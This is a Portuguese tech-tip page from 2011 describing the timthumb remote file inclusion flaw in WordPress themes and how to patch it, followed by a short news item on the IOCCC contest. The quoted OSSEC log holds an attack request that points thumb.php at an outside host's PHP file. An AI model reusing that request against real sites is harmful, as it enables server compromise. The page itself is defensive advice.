Acesso direto ao conteúdo
Logotipo Dicas-L, por Ricardo Burile

Busca
Visite também: Segurança Linux ·  UnderLinux ·  VivaOLinux ·  LinuxSecurity ·  NoticiasLinux ·  BR-Linux ·  SoftwareLivre.org ·  [mais]   
 

Você está aqui: Home  → Arquivo Dicas-L

 

Aprenda inglês de uma vez por todas

Assine a Lista Dicas-L

Receba diariamente por email as dicas
de informática publicadas neste site
Para se descadastrar, clique aqui.

WordPress - Corrigindo vulnerabilidade no timthumb

Colaboração: Alexandro Silva

Data de Publicação: 18 de novembro de 2011

Surgiu uma vulnerabilidade no Wordpress classificada como alta. A falha foi encontrada no script timthumb presente na maioria dos templates e permite a inclusão de arquivos maliciosos.

O Ossec alerta e bloqueia as tentativas de ataque com o objetivo de explorar está vulnerabilidade se a active-response foi habilitada. 

  OSSEC HIDS Notification.
  2011 Nov 11 03:29:38
  
  Received From: acme->/var/log/httpd/www.acme.com-access_log
  Rule: 31151 fired (level 10) -> "Mutiple web server 400 error codes from same source ip."
  Portion of the log(s):
  
  xx.xxx.xxx.xxx - - [11/Nov/2011:04:29:25 -0200] "GET //wp-content/themes/Quadro/thumb.php?src=http://picasa.com.xpl.be/yahoo.php
  
  HTTP/1.1" 404 232 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"

Para corrigi-la é necessário executar os seguintes passos:

  1. Localizar se o arquivo timthumb.php, thumb.php ou similar encontra-se no diretório template localizado em wp-content/themes;
  2. Em caso afirmativo substituir todo o código pela nova versão.
Notícia publicada originalmente no blog do autor

Mais informações

markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/

Competição de código C ofuscado retorna depois de 5 anos

Fonte: Notícias Linux

O "International Obfuscated C Code Contest" (IOCCC), Competição Internacional de Código C Ofuscado, retornou e anunciou o início da vigésima competição; a competição estava em hiato, sem resultados publicados para a última competição, que foi realizada em 2006. Agora a competição está de volta e, de 12 de novembro de 2011 até 12 de janeiro de 2012, as inscrições estão abertas para a competição de escrever o mais obscuro ou ofuscado programa em linguagem C que irá ilustrar, perversamente, a importância do estilo de programação, estressar compiladores C com relação a código estranho e demonstrar as sutilezas da linguagem C. Apesar da competição já estar aberta, as submissões online serão aceitas somente a partir de 1o. de dezembro, já que o sistema de submissão está sendo atualizado.

Veja a relação completa dos artigos de Alexandro Silva

Formato PDF
 Newsfeed RSS
 Formato para impressão
PDF RSS Imprimir

Referências Adicionais

Referências adicionais sobre os assuntos abordados neste site podem ser encontradas em nossa Bibliografia.

Avalie esta dica

  • Currently 3.00/5
  • 1
  • 2
  • 3
  • 4
  • 5

Avaliação: 3.0 /5 (392 votos)

Opinião dos Leitores

Seja o primeiro a comentar este artigo
*Nome:
Email:
Me notifique sobre novos comentários nessa página
Oculte meu email
*Texto:
 
  Para publicar seu comentário, digite o código contido na imagem acima
 


Powered by Scriptsmill Comments Script

Treinamentos, Consultorias e Soluçoes em TI. Baseados em softwares livres e padrões abertos para ambientes de missão crítica

Submarino.com.br

Asterisk na Prática 2ª Edição

 

 

Inversão de URLs